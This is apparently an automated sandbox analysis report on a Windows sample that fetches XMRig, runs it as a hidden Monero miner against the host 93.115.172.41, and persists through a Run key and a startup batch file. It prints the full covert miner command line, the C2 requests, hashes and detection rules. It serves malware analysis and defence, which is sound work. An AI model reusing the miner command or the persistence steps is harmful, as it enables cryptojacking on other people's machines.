Edit tour

Windows Analysis Report
pTVKHqys2h.exe

Overview

General Information

Sample name:	pTVKHqys2h.exe renamed because original name is a hash value
Original sample name:	62f3a21db99bcd45371ca4845c7296af81ce3ff6f0adcaee3f1698317dd4898b.exe
Analysis ID:	1586034
MD5:	7d6b277566cd13c79fc985cd532837ae
SHA1:	b26aabcb0e44af091f8adc8bd9c44ca2831b0463
SHA256:	62f3a21db99bcd45371ca4845c7296af81ce3ff6f0adcaee3f1698317dd4898b
Tags:	exeuser-johnk3r
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Xmrig

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Drops script or batch files to the startup folder

Found direct / indirect Syscall (likely to bypass EDR)

Found strings related to Crypto-Mining

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates driver files

Detected TCP or UDP traffic on non-standard ports

Dropped file seen in connection with other malware

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Yara signature match

Classification

Process Tree

System is w10x64

pTVKHqys2h.exe (PID: 3092 cmdline: "C:\Users\user\Desktop\pTVKHqys2h.exe" MD5: 7D6B277566CD13C79FC985CD532837AE)

process.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background MD5: CB166D49CE846727ED70134B589B0142)

conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

config.exe (PID: 940 cmdline: "C:\Users\user\AppData\Local\System32\config.exe" MD5: 7D6B277566CD13C79FC985CD532837AE)

config.exe (PID: 6044 cmdline: "C:\Users\user\AppData\Local\System32\config.exe" MD5: 7D6B277566CD13C79FC985CD532837AE)

cmd.exe (PID: 5652 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

process.exe (PID: 7108 cmdline: "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background MD5: CB166D49CE846727ED70134B589B0142)

conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\config.json	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x139e18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x6e87c1:$a1: mining.set_target 0x6da59a:$a2: XMRIG_HOSTNAME 0x6dd0d8:$a3: Usage: xmrig [OPTIONS] 0x6da574:$a4: XMRIG_VERSION
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x732a7e:$x1: donate.ssl.xmrig.com 0x732f39:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x733f88:$s1: %s/%s (Windows NT %lu.%lu 0x738710:$s3: \\.\WinRing0_ 0x6df212:$s4: pool_wallet 0x6d9980:$s5: cryptonight 0x6d998e:$s5: cryptonight 0x6d999d:$s5: cryptonight 0x6d99ab:$s5: cryptonight 0x6d99c0:$s5: cryptonight 0x6d99cf:$s5: cryptonight 0x6d99dd:$s5: cryptonight 0x6d99f2:$s5: cryptonight 0x6d9a01:$s5: cryptonight 0x6d9a12:$s5: cryptonight 0x6d9a29:$s5: cryptonight 0x6d9a37:$s5: cryptonight 0x6d9a45:$s5: cryptonight 0x6d9a55:$s5: cryptonight 0x6d9a67:$s5: cryptonight 0x6d9a78:$s5: cryptonight 0x6d9a88:$s5: cryptonight 0x6d9a98:$s5: cryptonight
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.3312672331.000001BA354A5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000002.00000000.2172935543.00007FF6DA481000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000002.00000002.3312372675.00000188D6595000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xf9c1:$a1: mining.set_target 0x179a:$a2: XMRIG_HOSTNAME 0x42d8:$a3: Usage: xmrig [OPTIONS] 0x1774:$a4: XMRIG_VERSION
00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xf9c1:$a1: mining.set_target 0x179a:$a2: XMRIG_HOSTNAME 0x42d8:$a3: Usage: xmrig [OPTIONS] 0x1774:$a4: XMRIG_VERSION
00000009.00000000.2397228619.00007FF6DA481000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000009.00000000.2396664069.00007FF6D9861000.00000020.00000001.01000000.00000006.sdmp	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x139a18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
00000002.00000000.2172219039.00007FF6D9861000.00000020.00000001.01000000.00000006.sdmp	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x139a18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
Process Memory Space: process.exe PID: 6848	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: process.exe PID: 6848	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xf37e:$a1: mining.set_target 0x9b97:$a2: XMRIG_HOSTNAME 0xbf5d:$a3: Usage: xmrig [OPTIONS] 0x9b71:$a4: XMRIG_VERSION
Process Memory Space: process.exe PID: 7108	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: process.exe PID: 7108	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x1c9ac:$a1: mining.set_target 0x171c5:$a2: XMRIG_HOSTNAME 0x1958b:$a3: Usage: xmrig [OPTIONS] 0x1719f:$a4: XMRIG_VERSION
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.0.process.exe.7ff6d9860000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
9.0.process.exe.7ff6d9860000.0.unpack	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x139e18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
9.0.process.exe.7ff6d9860000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x6e87c1:$a1: mining.set_target 0x6da59a:$a2: XMRIG_HOSTNAME 0x6dd0d8:$a3: Usage: xmrig [OPTIONS] 0x6da574:$a4: XMRIG_VERSION
9.0.process.exe.7ff6d9860000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x732a7e:$x1: donate.ssl.xmrig.com 0x732f39:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
9.0.process.exe.7ff6d9860000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x733f88:$s1: %s/%s (Windows NT %lu.%lu 0x738710:$s3: \\.\WinRing0_ 0x6df212:$s4: pool_wallet 0x6d9980:$s5: cryptonight 0x6d998e:$s5: cryptonight 0x6d999d:$s5: cryptonight 0x6d99ab:$s5: cryptonight 0x6d99c0:$s5: cryptonight 0x6d99cf:$s5: cryptonight 0x6d99dd:$s5: cryptonight 0x6d99f2:$s5: cryptonight 0x6d9a01:$s5: cryptonight 0x6d9a12:$s5: cryptonight 0x6d9a29:$s5: cryptonight 0x6d9a37:$s5: cryptonight 0x6d9a45:$s5: cryptonight 0x6d9a55:$s5: cryptonight 0x6d9a67:$s5: cryptonight 0x6d9a78:$s5: cryptonight 0x6d9a88:$s5: cryptonight 0x6d9a98:$s5: cryptonight
2.0.process.exe.7ff6d9860000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
2.0.process.exe.7ff6d9860000.0.unpack	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x139e18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
2.0.process.exe.7ff6d9860000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x6e87c1:$a1: mining.set_target 0x6da59a:$a2: XMRIG_HOSTNAME 0x6dd0d8:$a3: Usage: xmrig [OPTIONS] 0x6da574:$a4: XMRIG_VERSION
2.0.process.exe.7ff6d9860000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x732a7e:$x1: donate.ssl.xmrig.com 0x732f39:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
2.0.process.exe.7ff6d9860000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x733f88:$s1: %s/%s (Windows NT %lu.%lu 0x738710:$s3: \\.\WinRing0_ 0x6df212:$s4: pool_wallet 0x6d9980:$s5: cryptonight 0x6d998e:$s5: cryptonight 0x6d999d:$s5: cryptonight 0x6d99ab:$s5: cryptonight 0x6d99c0:$s5: cryptonight 0x6d99cf:$s5: cryptonight 0x6d99dd:$s5: cryptonight 0x6d99f2:$s5: cryptonight 0x6d9a01:$s5: cryptonight 0x6d9a12:$s5: cryptonight 0x6d9a29:$s5: cryptonight 0x6d9a37:$s5: cryptonight 0x6d9a45:$s5: cryptonight 0x6d9a55:$s5: cryptonight 0x6d9a67:$s5: cryptonight 0x6d9a78:$s5: cryptonight 0x6d9a88:$s5: cryptonight 0x6d9a98:$s5: cryptonight
Click to see the 5 entries

Sigma Signatures

Bitcoin Miner

Sigma detected: Xmrig

Source: Process started

Author: Joe Security: Data: Command: "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background, CommandLine: "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\System\process.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\System\process.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\System\process.exe, ParentCommandLine: "C:\Users\user\Desktop\pTVKHqys2h.exe", ParentImage: C:\Users\user\Desktop\pTVKHqys2h.exe, ParentProcessId: 3092, ParentProcessName: pTVKHqys2h.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background, ProcessId: 6848, ProcessName: process.exe

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\System32\config.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\pTVKHqys2h.exe, ProcessId: 3092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\config

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\pTVKHqys2h.exe, ProcessId: 3092, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\config.json	Avira: detection malicious, Label: PUA/CoinMiner.PF
Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe	Avira: detection malicious, Label: PUA/GM.Miner.ES

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\System32\config.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\System\process.exe (copy)	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: pTVKHqys2h.exe

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 93.8% probability

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 9.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3312672331.000001BA354A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2172935543.00007FF6DA481000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3312372675.00000188D6595000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2397228619.00007FF6DA481000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: process.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: process.exe PID: 7108, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\config.json, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, type: DROPPED

Found strings related to Crypto-Mining

Source: process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: cryptonight/0
Source: process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: stratum+tcp://
Source: process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: process.exe, 00000002.00000000.2172935543.00007FF6DA481000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: FileDescriptionXMRig miner.

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: pTVKHqys2h.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.0.dr

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 93.115.172.41:1300

Source: global traffic	HTTP traffic detected: GET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zip HTTP/1.1accept: /host: github.com
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/88327406/72dc0507-a032-45aa-8216-7bb8c017c7bb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T154021Z&X-Amz-Expires=300&X-Amz-Signature=8c4d676315f1311223ee8aea8fb8585ffbc7efe5c83d3fb7f3495c11451fe4bc&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-gcc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1accept: /referer: https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.ziphost: objects.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /private/aW5zdHJ1Y3Rpb25zCg==.txt HTTP/1.1accept: /host: 93.115.172.41
Source: global traffic	HTTP traffic detected: GET /private/aW5zdHJ1Y3Rpb25zCg==.txt HTTP/1.1accept: /host: 93.115.172.41
Source: global traffic	HTTP traffic detected: GET /private/aW5zdHJ1Y3Rpb25zCg==.txt HTTP/1.1accept: /host: 93.115.172.41

Source: Joe Sandbox View	IP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox View	IP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox View	IP Address: 185.199.110.133 185.199.110.133

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41
Source: unknown	TCP traffic detected without corresponding DNS query: 93.115.172.41

Source: global traffic	HTTP traffic detected: GET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zip HTTP/1.1accept: /host: github.com
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/88327406/72dc0507-a032-45aa-8216-7bb8c017c7bb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T154021Z&X-Amz-Expires=300&X-Amz-Signature=8c4d676315f1311223ee8aea8fb8585ffbc7efe5c83d3fb7f3495c11451fe4bc&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-gcc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1accept: /referer: https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.ziphost: objects.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /private/aW5zdHJ1Y3Rpb25zCg==.txt HTTP/1.1accept: /host: 93.115.172.41
Source: global traffic	HTTP traffic detected: GET /private/aW5zdHJ1Y3Rpb25zCg==.txt HTTP/1.1accept: /host: 93.115.172.41
Source: global traffic	HTTP traffic detected: GET /private/aW5zdHJ1Y3Rpb25zCg==.txt HTTP/1.1accept: /host: 93.115.172.41

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com

Source: pTVKHqys2h.exe, 00000000.00000003.2173687689.000001D5116FA000.00000004.00000020.00020000.00000000.sdmp, pTVKHqys2h.exe, 00000000.00000002.2174219149.000001D5116FA000.00000004.00000020.00020000.00000000.sdmp, pTVKHqys2h.exe, 00000000.00000003.2173394294.000001D5116FA000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000006.00000002.2341938643.000001994C818000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txt
Source: config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txtB
Source: config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txtN
Source: config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txtV
Source: config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txt~
Source: WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: pTVKHqys2h.exe, 00000000.00000003.2168163268.000001D511798000.00000004.00000020.00020000.00000000.sdmp, pTVKHqys2h.exe, 00000000.00000003.2171776516.000001D51172B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zip
Source: pTVKHqys2h.exe, 00000000.00000003.2171776516.000001D51172B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zipisco1n
Source: pool_mine_example.cmd.0.dr	String found in binary or memory: https://miningpoolstats.stream/monero
Source: rtm_ghostrider_example.cmd.0.dr	String found in binary or memory: https://miningpoolstats.stream/raptoreum
Source: pTVKHqys2h.exe, config.exe.0.dr	String found in binary or memory: https://supportportal.crowdstrike.com
Source: process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, process.exe, 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, xmrig.exe.0.dr	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, process.exe, 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, xmrig.exe.0.dr	String found in binary or memory: https://xmrig.com/docs/algorithms
